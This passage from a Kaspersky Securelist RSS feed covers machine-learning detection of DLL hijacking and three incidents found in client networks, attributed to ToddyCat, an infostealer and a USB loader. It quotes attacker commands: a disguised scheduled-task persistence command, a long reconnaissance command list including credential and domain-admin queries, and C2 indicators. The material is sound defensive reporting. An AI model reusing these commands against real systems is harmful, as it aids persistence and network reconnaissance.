href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117590" class="size-full wp-image-117590" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9.png" alt="Trends in true positives and false positives from the first-, second-, and third-generation models" width="1629" height="664" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9.png 1629w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-300x122.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-1024x417.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-768x313.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-1536x626.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-859x350.png 859w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-740x302.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-687x280.png 687w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-800x326.png 800w" sizes="auto, (max-width: 1629px) 100vw, 1629px" /></a><p id="caption-attachment-117590" class="wp-caption-text">Trends in true positives and false positives from the first-, second-, and third-generation models</p></div><p>As the models evolved, the percentage of true positives grew. While the first-generation model achieved a relatively good result (0.6 or higher) only with a very high false positive rate (10<sup>⁻³</sup> or more), the second-generation model reached this at 10<sup>⁻⁵</sup>. The third-generation model, at the same low false positive rate, produced 0.8 true positives, which is considered a good result.</p><p>Evaluating the models on the data stream at a fixed score shows that the absolute number of new events labeled as DLL Hijacking increased from one generation to the next. That said, evaluating the models by their false verdict rate also helps track progress: the first model has a fairly high error rate, while the second and third generations have significantly lower ones.</p><div class="js-infogram-embed" data-id="_/OWgUgOWv4ByEQ85H3Kvx" data-type="interactive" data-title="03-EN-DLL Hijacking charts" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>False positives rate among model outputs, July 2024 – August 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/02095204/03-en-dll-hijacking-charts-1.png" target="_blank" rel="noopener">download</a>)</em></p><h2 id="practical-application-of-the-models">Practical application of the models</h2><p>All three model generations are used in our internal systems to detect likely cases of DLL hijacking within telemetry data streams. We receive 6.5 million security events daily, linked to 800,000 unique files. Aggregates are built from this sample at a specified interval, enriched, and then fed into the models. The output data is then ranked by model and by the probability of DLL hijacking assigned to the event, and then sent to our analysts. For instance, if the third-generation model flags an event as DLL hijacking with high confidence, it should be investigated first, whereas a less definitive verdict from the first-generation model can be checked last.</p><p>Simultaneously, the models are tested on a separate data stream they have not seen before. This is done to assess their effectiveness over time, as a model’s detection performance can degrade. The graph below shows that the percentage of correct detections varies slightly over time, but on average, the models detect 70–80% of DLL hijacking cases.</p><div class="js-infogram-embed" data-id="_/x8oClVXPCh0H7k2VhVBA" data-type="interactive" data-title="04-EN-DLL Hijacking charts" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>DLL hijacking detection trends for all three models, October 2024 – September 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/02095150/04-en-dll-hijacking-charts-1.png" target="_blank" rel="noopener">download</a>)</em></p><p>Additionally, we recently deployed a DLL hijacking detection model into the <a href="https://www.kaspersky.com/enterprise-security/unified-monitoring-and-analysis-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e9dd8a9973100725" target="_blank" rel="noopener">Kaspersky SIEM</a>, but first we tested the model in the <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kmdr____8449ede27504ec48" target="_blank" rel="noopener">Kaspersky MDR</a> service. During the pilot phase, the model helped to detect and prevent a number of DLL hijacking incidents in our clients’ systems. We have written <a href="https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/" target="_blank" rel="noopener">a separate article</a> about how the machine learning model for detecting targeted attacks involving DLL hijacking works in Kaspersky SIEM and the incidents it has identified.</p><h2 id="conclusion">Conclusion</h2><p>Based on the training and application of the three generations of models, the experiment to detect DLL hijacking using machine learning was a success. We were able to develop a model that distinguishes events resembling DLL hijacking from other events, and refined it to a state suitable for practical use, not only in our internal systems but also in commercial products. Currently, the models operate in the cloud, scanning hundreds of thousands of unique files per month and detecting thousands of files used in DLL hijacking attacks each month. They regularly identify previously unknown variations of these attacks. The results from the models are sent to analysts who verify them and create new detection rules based on their findings.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Detecting DLL hijacking with machine learning: real-world cases</title> <link>https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/</link> <comments>https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/#respond</comments> <dc:creator><![CDATA[Gleb Ivanov, Andrey Gunkin]]></dc:creator> <pubDate>Mon, 06 Oct 2025 08:00:08 +0000</pubDate> <category><![CDATA[Security technologies]]></category> <category><![CDATA[Security technology]]></category> <category><![CDATA[Machine learning]]></category> <category><![CDATA[DLL hijacking]]></category> <category><![CDATA[Threat hunting]]></category> <category><![CDATA[DLL sideloading]]></category> <category><![CDATA[Cybersecurity]]></category> <category><![CDATA[Artificial intelligence]]></category> <category><![CDATA[DLL]]></category> <category><![CDATA[SIEM]]></category><category><![CDATA[Cybersecurity]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117567</guid> <description><![CDATA[We will tell you how we integrated a DLL Hijacking detection model into the Kaspersky SIEM platform and how it helped us uncover several incidents in their early stages.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2><p>Our colleagues from the AI expertise center recently developed a machine-learning model that detects DLL-hijacking attacks. We then integrated this model into the <a href="https://www.kaspersky.com/enterprise-security/unified-monitoring-and-analysis-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e9dd8a9973100725" target="_blank" rel="noopener">Kaspersky Unified Monitoring and Analysis Platform</a> SIEM system. In <a href="https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/" target="_blank" rel="noopener">a separate article</a>, our colleagues shared how the model had been created and what success they had achieved in lab environments. Here, we focus on how it operates within Kaspersky SIEM, the preparation steps taken before its release, and some real-world incidents it has already helped us uncover.</p><h2 id="how-the-model-works-in-kaspersky-siem">How the model works in Kaspersky SIEM</h2><p>The model’s operation generally boils down to a step-by-step check of all DLL libraries loaded by processes in the system, followed by validation in the Kaspersky Security Network (KSN) cloud. This approach allows local attributes (path, process name, and file hashes) to be combined with a global knowledge base and behavioral indicators, which significantly improves detection quality and reduces the probability of false positives.</p><p>The model can run in one of two modes: on a correlator or on a collector. A correlator is a SIEM component that performs event analysis and correlation based on predefined rules or algorithms. If detection is configured on a correlator, the model checks events that have already triggered a rule. This reduces the volume of KSN queries and the model’s response time.</p><p>This is how it looks:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117570" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2.png" alt="" width="984" height="395" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2.png 984w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-300x120.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-768x308.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-872x350.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-740x297.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-698x280.png 698w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-800x321.png 800w" sizes="auto, (max-width: 984px) 100vw, 984px" /></a></p><p>A collector is a software or hardware component of a SIEM platform that collects and normalizes events from various sources, and then delivers these events to the platform’s core. If detection is configured on a collector, the model processes all events associated with various processes loading libraries, provided these events meet the following conditions:</p><ul><li>The path to the process file is known.</li><li>The path to the library is known.</li><li>The hashes of the file and the library are available.</li></ul><p>This method consumes more resources, and the model’s response takes longer than it does on a correlator. However, it can be useful for retrospective threat hunting because it allows you to check all events logged by Kaspersky SIEM. The model’s workflow on a collector looks like this:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117572" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4.png" alt="" width="984" height="366" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4.png 984w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-300x112.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-768x286.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-941x350.png 941w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-740x275.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-753x280.png 753w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-800x298.png 800w" sizes="auto, (max-width: 984px) 100vw, 984px" /></a></p><p>It is important to note that the model is not limited to a binary “malicious/non-malicious” assessment; it ranks its responses by confidence level. This allows it to be used as a flexible tool in SOC practice. Examples of possible verdicts:</p><ul><li>0: data is being processed.</li><li>1: maliciousness not confirmed. This means the model currently does not consider the library malicious.</li><li>2: suspicious library.</li><li>3: maliciousness confirmed.</li></ul><p>A Kaspersky SIEM rule for detecting DLL hijacking would look like this:</p><pre class="urvanov-syntax-highlighter-plain-tag">N.KL_AI_DLLHijackingCheckResult > 1</pre><p>Embedding the model into the Kaspersky SIEM correlator automates the process of finding DLL-hijacking attacks, making it possible to detect them at scale without having to manually analyze hundreds or thousands of loaded libraries. Furthermore, when combined with correlation rules and telemetry sources, the model can be used not just as a standalone module but as part of a comprehensive defense against infrastructure attacks.</p><h2 id="incidents-detected-during-the-pilot-testing-of-the-model-in-the-mdr-service">Incidents detected during the pilot testing of the model in the MDR service</h2><p>Before being released, the model (as part of the Kaspersky SIEM platform) was tested in the <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kmdr____8449ede27504ec48" target="_blank" rel="noopener">MDR</a> service, where it was trained to identify attacks on large datasets supplied by our telemetry. This step was necessary to ensure that detection works not only in lab settings but also in real client infrastructures.</p><p>During the pilot testing, we verified the model’s resilience to false positives and its ability to correctly classify behavior even in non-typical DLL-loading scenarios. As a result, several real-world incidents were successfully detected where attackers used one type of DLL hijacking — the DLL Sideloading technique — to gain persistence and execute their code in the system.</p><p>Let us take a closer look at the three most interesting of these.</p><h3 id="incident-1-toddycat-trying-to-launch-cobalt-strike-disguised-as-a-system-library">Incident 1. ToddyCat trying to launch Cobalt Strike disguised as a system library</h3><p>In one incident, the attackers successfully leveraged the vulnerability <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27076" target="_blank" rel="noopener">CVE-2021-27076</a> to exploit a SharePoint service that used IIS as a web server. They ran the following command:</p><pre class="urvanov-syntax-highlighter-plain-tag">c:\windows\system32\inetsrv\w3wp.exe -ap "SharePoint - 80" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipmd32ded38-e45b-423f-804d-34471928538b -h "C:\inetpub\temp\apppools\SharePoint - 80\SharePoint - 80.config" -w "" -m 0</pre><p>After the exploitation, the IIS process created files that were later used to run malicious code via the DLL sideloading technique (<a href="https://attack.mitre.org/techniques/T1574/001/" target="_blank" rel="noopener">T1574.001 Hijack Execution Flow:</a><a href="https://attack.mitre.org/techniques/T1574/001/" target="_blank" rel="noopener"> DLL</a>):</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\ProgramData\SystemSettings.exeC:\ProgramData\SystemSettings.dll</pre><p>SystemSettings.dll is the name of a library associated with the Windows Settings application (SystemSettings.exe). The original library contains code and data that the Settings application uses to manage and configure various system parameters. However, the library created by the attackers has malicious functionality and is only pretending to be a system library.</p><p>Later, to establish persistence in the system and launch a DLL sideloading attack, a scheduled task was created, disguised as a Microsoft Edge browser update. It launches a SystemSettings.exe file, which is located in the same directory as the malicious library:</p><pre class="urvanov-syntax-highlighter-plain-tag">Schtasks /create /ru "SYSTEM" /tn "\Microsoft\Windows\Edge\Edgeupdates" /sc DAILY /tr "C:\ProgramData\SystemSettings.exe" /F</pre><p>The task is set to run daily.</p><p>When the SystemSettings.exe process is launched, it loads the malicious DLL. As this happened, the process and library data were sent to our model for analysis and detection of a potential attack.</p><div id="attachment_117573" style="width: 693px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117573" class="size-full wp-image-117573" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3.png" alt="Example of a SystemSettings.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM" width="683" height="1082" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3.png 683w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-189x300.png 189w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-646x1024.png 646w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-221x350.png 221w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-631x1000.png 631w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-177x280.png 177w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-568x900.png 568w" sizes="auto, (max-width: 683px) 100vw, 683px" /></a><p id="caption-attachment-117573" class="wp-caption-text">Example of a SystemSettings.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM</p></div><p>The resulting data helped our analysts highlight a suspicious DLL and analyze it in detail. The library was found to be a <a href="https://tip.kaspersky.com/landscape/software/S0353" target="_blank" rel="noopener">Cobalt Strike</a> implant. After loading it, the SystemSettings.exe process attempted to connect to the attackers’ command-and-control server.</p><pre class="urvanov-syntax-highlighter-plain-tag">DNS query: connect-microsoft[.]comDNS query type: AAAADNS response: ::ffff:8.219.1[.]155;8.219.1[.]155:8443</pre><p>After establishing a connection, the attackers began host reconnaissance to gather various data to develop their attack.</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\ProgramData\SystemSettings.exewhoami /privhostnamereg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuidpowershell -c $psversiontabledotnet --versionsysteminforeg query "HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Drivers"cmdkey /listREG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumberreg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Serversnetsh wlan show profilesnetsh wlan show interfacessetnet localgroup administratorsnet usernet user administratoripconfig /allnet config workstationnet viewarp -aroute printnetstat -anotasklistschtasks /query /fo LIST /vnet startnet sharenet usenetsh firewall show confignetsh firewall show statenet view /domainnet time /domainnet group "domain admins" /domainnet localgroup administrators /domainnet group "domain controllers" /domainnet accounts /domainnltest / domain_trustsreg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOncereg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runreg query HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Runreg query HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce</pre><p>Based on the attackers’ TTPs, such as <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">loading Cobalt Strike as a DLL</a>, using the DLL sideloading technique (<a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">1</a>, <a href="https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/" target="_blank" rel="noopener">2</a>), and exploiting SharePoint, we can say with a high degree of confidence that the <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener">ToddyCat APT group</a> was behind the attack. Thanks to the prompt response of our model, we were able to respond in time and block this activity, preventing the attackers from causing damage to the organization.</p><h3 id="incident-2-infostealer-masquerading-as-a-policy-manager">Incident 2. Infostealer masquerading as a policy manager</h3><p>Another example was discovered by the model after a client was connected to MDR monitoring: a legitimate system file located in an application folder attempted to load a suspicious library that was stored next to it.</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\Program Files\Chiniks\SettingSyncHost.exeC:\Program Files\Chiniks\policymanager.dll E83F331BD1EC115524EBFF7043795BBE</pre><p>The SettingSyncHost.exe file is a system host process for synchronizing settings between one user’s different devices. Its 32-bit and 64-bit versions are usually located in C:\Windows\System32\ and C:\Windows\SysWOW64\, respectively. In this incident, the file location differed from the normal one.</p><div id="attachment_117574" style="width: 877px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117574" class="size-full wp-image-117574" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4.png" alt="Example of a policymanager.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM" width="867" height="818" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-300x283.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-768x725.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-371x350.png 371w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-740x698.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-297x280.png 297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-800x755.png 800w" sizes="auto, (max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-117574" class="wp-caption-text">Example of a policymanager.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM</p></div><p>Analysis of the library file loaded by this process showed that it was malware designed to steal information from browsers.</p><div id="attachment_117575" style="width: 984px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117575" class="size-full wp-image-117575" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5.png" alt="Graph of policymanager.dll activity in a sandbox" width="974" height="503" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5.png 974w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-300x155.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-768x397.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-678x350.png 678w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-740x382.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-542x280.png 542w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-800x413.png 800w" sizes="auto, (max-width: 974px) 100vw, 974px" /></a><p id="caption-attachment-117575" class="wp-caption-text">Graph of policymanager.dll activity in a sandbox</p></div><p>The file directly accesses browser files that contain user data.</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Local State</pre><p>The library file is on the list of files used for DLL hijacking, as published in the HijackLibs project. The project contains a list of common processes and libraries employed in DLL-hijacking attacks, which can be used to detect these attacks.</p><h3 id="incident-3-malicious-loader-posing-as-a-security-solution">Incident 3. Malicious loader posing as a security solution</h3><p>Another incident discovered by our model occurred when a user connected a removable USB drive:</p><div id="attachment_117576" style="width: 984px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117576" class="size-full wp-image-117576" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6.png" alt="Example of a Kaspersky SIEM event where a wsc.dll library was loaded from a USB drive, with a DLL Hijacking module verdict" width="974" height="894" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6.png 974w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-300x275.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-768x705.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-381x350.png 381w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-740x679.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-305x280.png 305w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-800x734.png 800w" sizes="auto, (max-width: 974px) 100vw, 974px" /></a><p id="caption-attachment-117576" class="wp-caption-text">Example of a Kaspersky SIEM event where a wsc.dll library was loaded from a USB drive, with a DLL Hijacking module verdict</p></div><p>The connected drive’s directory contained hidden folders with an identically named shortcut for each of them. The shortcuts had icons typically used for folders. Since file extensions were not shown by default on the drive, the user might have mistaken the shortcut for a folder and launched it. In turn, the shortcut opened the corresponding hidden folder and ran an executable file using the following command:</p><pre class="urvanov-syntax-highlighter-plain-tag">"%comspec%" /q /c "RECYCLER.BIN\1\CEFHelper.exe [$DIGITS] [$DIGITS]"</pre><p>CEFHelper.exe is a legitimate Avast Antivirus executable that, through DLL sideloading, loaded the wsc.dll library, which is a malicious loader.</p><div id="attachment_117577" style="width: 461px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117577" class="size-full wp-image-117577" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7.png" alt="Code snippet from the malicious file" width="451" height="485" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7.png 451w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7-279x300.png 279w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7-325x350.png 325w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7-260x280.png 260w" sizes="auto, (max-width: 451px) 100vw, 451px" /></a><p id="caption-attachment-117577" class="wp-caption-text">Code snippet from the malicious file</p></div><p>The loader opens a file named AvastAuth.dat, which contains an encrypted backdoor. The library reads the data from the file into memory, decrypts it, and executes it. After this, the backdoor attempts to connect to a remote command-and-control server.</p><p>The library file, which contains the malicious loader, is on the list of known libraries used for DLL sideloading, as presented on the HijackLibs project website.</p><h2 id="conclusion">Conclusion</h2><p>Integrating the model into the product provided the means of early and accurate detection of DLL-hijacking attempts which previously might have gone unnoticed. Even during the pilot testing, the model proved its effectiveness by identifying several incidents using this technique. Going forward, its accuracy will only increase as data accumulates and algorithms are updated in KSN, making this mechanism a reliable element of proactive protection for corporate systems.</p><h2 id="ioc">IoC</h2><p><strong>Legitimate files used for DLL hijacking<br /></strong>E0E092D4EFC15F25FD9C0923C52C33D6 loads SystemSettings.dll<br />09CD396C8F4B4989A83ED7A1F33F5503 loads policymanager.dll<br />A72036F635CECF0DCB1E9C6F49A8FA5B loads wsc.dll</p><p><strong>Malicious files</strong><br /><a href="https://opentip.kaspersky.com/ea2882b05f8c11a285426f90859f23c6/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______20de3dc00773942a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">EA2882B05F8C11A285426F90859F23C6</a> SystemSettings.dll<br /><a href="https://opentip.kaspersky.com/e83f331bd1ec115524ebff7043795bbe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cbf93adf43b574f2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">E83F331BD1EC115524EBFF7043795BBE</a> policymanager.dll<br /><a href="https://opentip.kaspersky.com/831252e7fa9bd6fa174715647ebce516/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______01488fcf88e4ecaf&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">831252E7FA9BD6FA174715647EBCE516</a> wsc.dll</p><p><strong>Paths</strong><br />C:\ProgramData\SystemSettings.exe<br />C:\ProgramData\SystemSettings.dll<br />C:\Program Files\Chiniks\SettingSyncHost.exe<br />C:\Program Files\Chiniks\policymanager.dll<br />D:\RECYCLER.BIN\1\CEFHelper.exe<br />D:\RECYCLER.BIN\1\wsc.dll</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" 